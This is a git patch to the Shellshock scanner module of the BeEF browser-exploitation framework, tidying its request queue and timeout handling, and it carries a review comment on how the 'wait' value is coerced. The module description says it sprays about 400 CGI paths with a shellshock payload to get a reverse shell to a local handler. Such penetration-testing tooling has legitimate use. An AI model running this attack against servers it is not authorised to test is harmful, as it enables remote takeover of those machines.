From 8a8ea35265dbcf72498c8a73025971b887c0ed8d Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Tue, 6 Jan 2015 10:27:10 +0000
Subject: [PATCH] Module clean up
---
 modules/exploits/shell_shock_scanner/command.js | 14 ++++++--------
 modules/exploits/shell_shock_scanner/config.yaml | 2 +-
 modules/exploits/shell_shock_scanner/module.rb | 3 +--
 3 files changed, 8 insertions(+), 11 deletions(-)
diff --git a/modules/exploits/shell_shock_scanner/command.js b/modules/exploits/shell_shock_scanner/command.js
index 98d768ae8..28c34dba6 100644
--- a/modules/exploits/shell_shock_scanner/command.js
+++ b/modules/exploits/shell_shock_scanner/command.js
@@ -13,7 +13,6 @@ beef.execute(function() {
 var target = rproto + '://' + rhost + ':' + rport;
 var method = '<%= @method %>';
 var wait = '<%= @wait %>';
- var timeout = '<%= @timeout %>';
 get_cgi = function(uri) {
 try {
@@ -34,7 +33,8 @@ beef.execute(function() {
 }
 }
- var scripts = new Array(
+ // add scripts to queue
+ var requests = new Array(
 <%=
 scripts = []
 File.open("#{$root_dir}/modules/exploits/shell_shock_scanner/shocker-cgi_list", 'r') do |file_handle|
@@ -49,12 +49,10 @@ beef.execute(function() {
 %>
 );
- // add scripts to queue
- var requests = [];
- for (var i=0; i", <%= @command_id %>, "result=starting scan");
+ beef.debug("[command #<%= @command_id %>] Starting Shellshock scan of "+target+" ("+requests.length+" URLs)");
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=starting scan of "+target+" ("+requests.length+" URLs)");
+ var timeout = wait * requests.length + 10;
 var handle = setInterval(function() {
 if (requests.length > 0) {
 get_cgi(requests.pop());
@@ -64,7 +62,7 @@ beef.execute(function() {
 // clean up
 cleanup = function() {
 if (handle) {
- beef.debug("Killing timer [ID: " + handle + "]");
+ beef.debug("[command #<%= @command_id %>] Killing timer [ID: " + handle + "]");
 clearInterval(handle);
 handle = 0;
 beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=scan complete");
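Review bot: `wait` reaches the added `var timeout = wait * requests.length + 10;` as the raw string from `'<%= @wait %>'`, so the multiplication coerces it silently: a non-numeric option value yields `NaN`, and an empty or zero value collapses the deadline to 10 seconds, with no diagnostic in either case. Because this commit removes the separate timeout option, this one free-text field now decides both the request pacing and the cleanup deadline, so it should be parsed and bounded once, e.g. `var delay = parseFloat(wait); if (!isFinite(delay) || delay <= 0) delay = 0.3;` followed by `var timeout = delay * requests.length + 10;`; that also keeps an authorised scan from degenerating into an unpaced burst of requests against the target. A short comment stating that the value is in seconds and that the `10` is slack for the last responses would make the formula self-explanatory. The interval argument of `setInterval` and the place where `timeout` is consumed lie outside the hunk, so how they treat the value is not visible here.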
diff --git a/modules/exploits/shell_shock_scanner/config.yaml b/modules/exploits/shell_shock_scanner/config.yaml
index 06b6c3ac9..3e715f0ac 100644
--- a/modules/exploits/shell_shock_scanner/config.yaml
+++ b/modules/exploits/shell_shock_scanner/config.yaml
@@ -9,7 +9,7 @@ beef:
 enable: true
 category: "Exploits"
 name: "Shell Shock Scanner (Reverse Shell)"
- description: "This module attempts to get a reverse shell on the specified web server, blindly, by requesting ~400 potentially vulnerable CGI scripts. Each CGI is requested with a shellshock payload in the 'Accept' HTTP header.
The list of CGI scripts was taken from Shocker."
+ description: "This module attempts to get a reverse shell on the specified web server, blindly, by requesting ~400 potentially vulnerable CGI scripts. Each CGI is requested with a shellshock payload in the 'Accept' HTTP header.
The list of CGI scripts was taken from Shocker.

The scan will take about 2 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below."
 authors: ["Stephane Chazelas", "mz", "bmantra", "radoen", "bcoles"]
 target:
 working: ["ALL"]
diff --git a/modules/exploits/shell_shock_scanner/module.rb b/modules/exploits/shell_shock_scanner/module.rb
index 3e084d3a1..4a796020a 100644
--- a/modules/exploits/shell_shock_scanner/module.rb
+++ b/modules/exploits/shell_shock_scanner/module.rb
@@ -30,8 +30,7 @@ class Shell_shock_scanner < BeEF::Core::Command
 { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
 { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost },
 { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' },
- { 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width'=>'100px' },
- { 'name' => 'timeout', 'ui_label' => 'Scan timeout (s)', 'value' => '180'}
+ { 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width'=>'100px' }
 ]
 end